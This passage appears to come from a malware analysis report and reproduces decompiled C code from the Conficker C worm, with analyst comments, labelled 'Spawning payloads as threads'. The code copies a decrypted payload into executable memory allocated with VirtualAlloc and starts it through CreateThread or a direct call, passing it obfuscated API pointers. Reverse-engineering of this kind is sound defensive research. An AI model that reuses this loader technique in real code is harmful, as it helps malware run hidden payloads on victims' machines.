int a4, int a5, int a6, int a7) {
thread_parametrs *result;
thread_parametrs *v8;
unsigned int executable_payload_size_var;
int i;
char *v11;
char v12;
unsigned int v13;
int v14;
int v15;
char v16;
unsigned int v17;
int v18;
void *v19;
const void *v20;
char ThreadId;
thread_parametrs *v22;
executable_payload_size_var = (unsigned int)this;
result = Global_alloc(0x20u);
v8 = result;
v22 = result;
if ( result )
{
result->chunks = (executable_payload_size_var + 0xFFF) & 0xFFFFF000;
result = VirtualAlloc(0, (executable_payload_size_var + 0xFFF) & 0xFFFFF000,
0x3000u, 0x40u);
v8->payload = (int)result;
if (result ) {
/* copy payload and peer info to a data structure passed at a parameter to
the spawned thread */
v12 = v8->chunks;
v13 = (unsigned int)v8->elem2 >> 2;
memset(result, 0, 4 * v13);
v11 = (char *)result + 4 * v13;
for ( i = v12 & 3; i; --i ) *v11++ = 0;
v16 = executable_payload_size_var;
v17 = executable_payload_size_var >> 2;
v18 = v8->payload;
memcpy((void *)v8->payload, decrypted_code, 4 *
(executable_payload_size_var >> 2));
v20 = (char *)decrypted_code + 4 * (executable_payload_size_var >> 2);
v19 = (void *)(v18 + 4 * v17);
memcpy(v19, v20, v16 & 3);
v15 = (int)((char *)v20 + (v16 & 3));
v14 = (int)((char *)v19 + (v16 & 3));
v8->array_APIs = **(_DWORD **)dword_9BCB74;
v8->GEtProcAddress = *(_DWORD *)(*(_DWORD *)dword_9BCB74 + 8);
/* pass to the thread the address of the array containing the
obfuscated APIs used in the obfuscated Conficker C P2P code
and a pointer to GetProcAddress to load more APIs if needed */
v8->decrypted_payload = a4;
v8->port = a5;
v8->a4 = a6;
v8->a5 = a7;
if ( control )
/* in Conficker C this argument is always equal to 1 */
{
/* create a thread at the address of the begining of the
decrypted payload */
result = CreateThread(0, 0,decrypted_code , v8, 0,
(LPDWORD)&ThreadId);
if ( result )
if ( result != -1 ) result = CloseHandle(result);
}
else {
/* call the payload as a function using the call instruction */
result = call_arg(a5, a7, (int)v8, v14, v15, (int)v8);
}
}
}
return result;
}
LISTING 18: Spawning payloads as threads